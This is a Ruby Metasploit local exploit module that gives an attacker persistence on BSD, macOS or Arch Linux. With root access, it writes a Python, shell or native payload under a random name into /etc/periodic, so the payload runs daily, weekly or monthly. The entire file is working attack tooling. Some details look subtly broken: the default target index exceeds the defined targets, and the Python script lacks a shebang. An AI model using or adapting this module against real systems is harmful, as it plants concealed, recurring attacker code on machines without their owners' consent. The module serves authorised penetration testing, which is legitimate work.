1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  prepend Msf::Exploit::Remote::AutoCheck
10
  include Msf::Post::File
11
  include Msf::Exploit::EXE
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Periodic Script Persistence',
18
        'Description' => %q{
19
          This module will achieve persistence by writing a script to the /etc/periodic directory.
20
          According to The Art of Mac Malware no such malware species persist in this manner (2024).
21
          This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'gardnerapp',
26
          'msutovsky-r7'
27
        ],
28
        'References' => [
29
          [
30
            'URL', 'https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf',
31
            'URL', 'https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/'
32
          ]
33
        ],
34
        'DisclosureDate' => '2012-04-01',
35
        'Privileged' => true,
36
        'Platform' => %w[bsd unix osx],
37
        'Targets' => [
38
          [ 'OSX', { 'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64], 'Platform' => 'osx' } ],
39
          [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ],
40
          [ 'Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],
41
          [ 'Bsd', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'bsd' }]
42
        ],
43
        'DefaultOptions' => {
44
          'DisablePayloadHandler' => true
45
        },
46
        'DefaultTarget' => 4,
47
        'SessionTypes' => [ 'shell', 'meterpreter' ],
48
        'Notes' => {
49
          'Stability' => [CRASH_SAFE],
50
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
51
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
52
        }
53
      )
54
    )
55

56
    register_options([
57
      OptEnum.new('PERIODIC_DIR', [true, 'Periodic Directory to write script eg. /etc/periodic/daily', 'daily', %w[daily weekly monthly]]),
58
      OptString.new('PERIODIC_SCRIPT_NAME', [false, 'Name of periodic script']),
59
    ])
60
  end
61

62
  def check
63
    periodic = "/etc/periodic/#{datastore['PERIODIC_DIR']}/"
64

65
    return CheckCode::Vulnerable "#{periodic} is writable" if writable? periodic
66

67
    CheckCode::Safe "Unable to write to #{periodic}"
68
  end
69

70
  def write_periodic_script(payload_content)
71
    periodic_dir = "/etc/periodic/#{datastore['PERIODIC_DIR']}/"
72

73
    periodic_script_name = datastore['PERIODIC_SCRIPT_NAME'].blank? ? Rex::Text.rand_text_alphanumeric(rand(6..13)) : datastore['PERIODIC_SCRIPT_NAME']
74
    periodic_script = File.join(periodic_dir, periodic_script_name)
75

76
    @clean_up_rc << periodic_script.to_s
77

78
    fail_with(Failure::UnexpectedReply, "Unable to write #{periodic_script}") unless upload_and_chmodx(periodic_script, payload_content)
79

80
    print_status "Succesfully wrote periodic script to #{periodic_script}."
81
  end
82

83
  def exploit
84
    @clean_up_rc = 'sudo rm'
85

86
    if target['Arch'] == ARCH_PYTHON
87
      print_status 'Getting python version & path.'
88

89
      python = cmd_exec('which python3 || which python2 || which python')
90

91
      fail_with(Failure::PayloadFailed, 'Unable to find python version. ') if python.blank? || !file?(python)
92

93
      print_good "Found python path #{python}"
94

95
      payload_bin = "#{python}\n" + payload.encoded
96
    elsif target['Arch'] == ARCH_CMD
97
      payload_bin = "#!/usr/bin/env #{cmd_exec('echo ${SHELL}')}\n" + payload.encoded
98
    else
99
      payload_bin = generate_payload_exe
100
    end
101

102
    write_periodic_script payload_bin
103

104
    print_status("Cleanup command '#{@clean_up_rc}'")
105
  end
106
end
107

108